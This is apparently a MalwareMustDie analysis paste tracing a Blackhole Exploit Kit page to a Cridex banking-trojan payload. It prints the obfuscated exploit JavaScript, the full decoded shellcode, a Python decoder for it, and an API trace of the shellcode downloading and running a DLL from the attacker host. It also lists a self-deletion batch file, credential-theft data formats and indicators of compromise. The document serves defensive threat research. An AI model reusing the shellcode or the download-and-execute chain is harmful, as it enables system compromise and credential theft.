#MalwareMustDie - New Cridex Payload Mar 06 2013

MalwareMustDie, Mar 5th, 2013
==================================================================
#MalwareMustDie! bash-2.02$ date
Tue Mar  5 09:04:35  2013 @unixfreaxjp
Proof of Concept of a NEW ACTIVE malware infector:
IP: 46・4・77・145
URL: h00p://46・4・77・145:8080/forum/links/column・php
Verdict: Blackhole Exploit Kit 2.x
Malware payload: Cridex
==================================================================

--2013-03-06 01:57:44--  h00p://46・4・77・145:8080/forum/links/column・php
seconds 0.00, Connecting to 46・4・77・145:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0
Referer: http://google.com/
Host: 46・4・77・145:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 05 Mar 2013 16:57:21 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `column.php'
2013-03-06 01:57:47 (81.2 KB/s) - `column.php' saved [156811]


$ cat ./column.php

   :
   :
function getShellCode(){
  var a = "
8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
  :
0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().
  join("");
  return a["replace"](/\%!/g, "%" + "u")
}
  :

// decoded...

var a = "8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%
  :
0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var xxx=  a["replace"](/\%!/g, "%" + "u");
document.write(xxx);

// into shellcodes...

%u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uOde9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278%u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c%uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u1e1c%u1cO6%u1fO6%uO61f%u1c19%u121d%u181O%u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e45%u1a15%u125f%u4419%u1912%u1244%u5e1a%u1912%uOe4e%u4d5a%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u4dOe%u1915%uOe43%u4c5e%u4c15%u43Oe%u1559%u284a%uOO28";
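The unobfuscation step shown above (reverse the string, then turn each `%!` marker into `%u`), carried through to the raw bytes, as an added Python example that is not part of the original paste. The sample input is constructed from the tail of the encoded blob above, and the byte output is what a JavaScript `unescape()` of the resulting `%uXXXX` string leaves in memory (each 16-bit unit stored little-endian), which is what an analyst feeds to a disassembler.

```python
import re

# Constructed sample: the last six chunks of the obfuscated `var a` string
# quoted in the paste. Any longer tail of that string works the same way.
SAMPLE_OBFUSCATED = "0185!%cfbe!%4ecf!%6638!%1414!%1414!%"


def deobfuscate(obf: str) -> str:
    """Mirror the page's getShellCode(): reverse the text, then replace the
    '%!' marker with '%u' so the result is a plain %uXXXX escape string."""
    return obf[::-1].replace("%!", "%u")


def unescape_u(esc: str) -> bytes:
    """Decode a %uXXXX escape string to the bytes a JS unescape() would
    produce in memory: every 16-bit unit is stored little-endian.
    Raises ValueError if the string is not made purely of %uXXXX units,
    which is the usual sign that the de-obfuscation step went wrong."""
    units = re.findall(r"%u([0-9a-fA-F]{4})", esc)
    if len(units) * 6 != len(esc):
        raise ValueError("string is not purely %uXXXX units")
    out = bytearray()
    for unit in units:
        out += int(unit, 16).to_bytes(2, "little")
    return bytes(out)


def decode_shellcode(obf: str) -> bytes:
    """Full pipeline: obfuscated text from the page -> raw shellcode bytes."""
    return unescape_u(deobfuscate(obf))


if __name__ == "__main__":
    # The escape string matches the start of the shellcode shown in the paste.
    print(deobfuscate(SAMPLE_OBFUSCATED))  # %u4141%u4141%u8366%ufce4%uebfc%u5810
    print(decode_shellcode(SAMPLE_OBFUSCATED).hex())
```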

// translate per api references...

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

// payload url..

h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b

// download payload... (for backup the PoC I uploaded here too: http://urlquery.net/report.php?id=1268437 )

--2013-03-06 02:09:26--  h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b
seconds 0.00, Connecting to 46・4・77・145:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b HTTP/1.0
Host: 46・4・77・145:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 05 Mar 2013 17:09:03 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 05 Mar 2013 17:09:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 102400
200 OK
Length: 102400 (100K) [application/x-msdownload]
Saving to: `readme.exe'
2013-03-06 02:09:28 (53.1 KB/s) - `readme.exe' saved [102400/102400]

//Faking MS Application (again...)

StringFileInfo
CompanyName: Microsoft Corporation
FileDescription: OLE DocFile Property Page
FileVersion: 6.0.6000.16386 (vista_rtm.061101-2205)
InternalName: docprop.dll
LegalCopyright: Microsoft Corporation. All rights reserved.
OriginalFilename: docprop.dll
ProductName: Microsoft Windows Operating System
ProductVersion
VarFileInfo
Translation


// Self deletion batch file:
@echo off
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"

// Wrote files

%Temp%\exp1.tmp.bat
%Temp%\exp*.tmp.exe
%AppData%\KB00927107.exe

// Malware Process:

C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp1.tmp.bat""
C:\Documents and Settings\<USER>\Application Data\KB00927107.exe
C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp*.tmp.exe

// Cridex Callbacks...

// Cridex sent Credential formats:
application/x-www-form-urlencoded
<http time="%%%uu"><url><![CDATA[%%.%us]]></url><useragent><![CDATA[%%.%us]]></useragent><data><![CDATA[
]]></data></http>
<httpshot time="%%%uu"><url><![CDATA[%%.%us]]></url><data><![CDATA[
]]></data></httpshot>
<ftp time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server><user><![CDATA[%%.%us]]></user><pass><![CDATA[
]]></pass></ftp>
<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server><user><![CDATA[%%.%us]]></user><pass><![CDATA[
]]></pass></pop3>
<cmd id="%u">%u</cmd>
<cert time="%u"><pass><![CDATA[
]]></pass><data><![CDATA[
]]></data></cert>
<ie time="%u"><data><![CDATA[
]]></data></ie>
<ff time="%u"><data><![CDATA[
]]></data></ff>
<mm time="%u"><data><![CDATA[
]]></data></mm>
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"><header><unique>%%.%us</unique><version>%%u</version><system>%%u</system><network>%%u</network></header><data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data></message>

//Credentials stealer scripts commands:
settings
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects

//Botnets commands:
Connection
modify
pattern
replacement
httpinject
conditions
actions
redirect
process

// Virus Total check...

URL: https://www.virustotal.com/en/file/a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405/analysis/1362504075/
SHA256: a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405
SHA1: 014fe37cd0b08936b54dabb2d44ca0901f741184
MD5: 31de2e1b48a8341c3732b97e61712a56
File size: 100.0 KB ( 102400 bytes )
File name: docprop.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 2 / 46 <========== VERY LOW!!!
Analysis date: 2013-03-05 17:08:27 UTC ( 14 minutes ago )

Fortinet      : W32/Kryptik.ALRY!tr
Kaspersky   : UDS:DangerousObject.Multi.Generic


----
#MalwareMustDie!!
@unixfreaxjp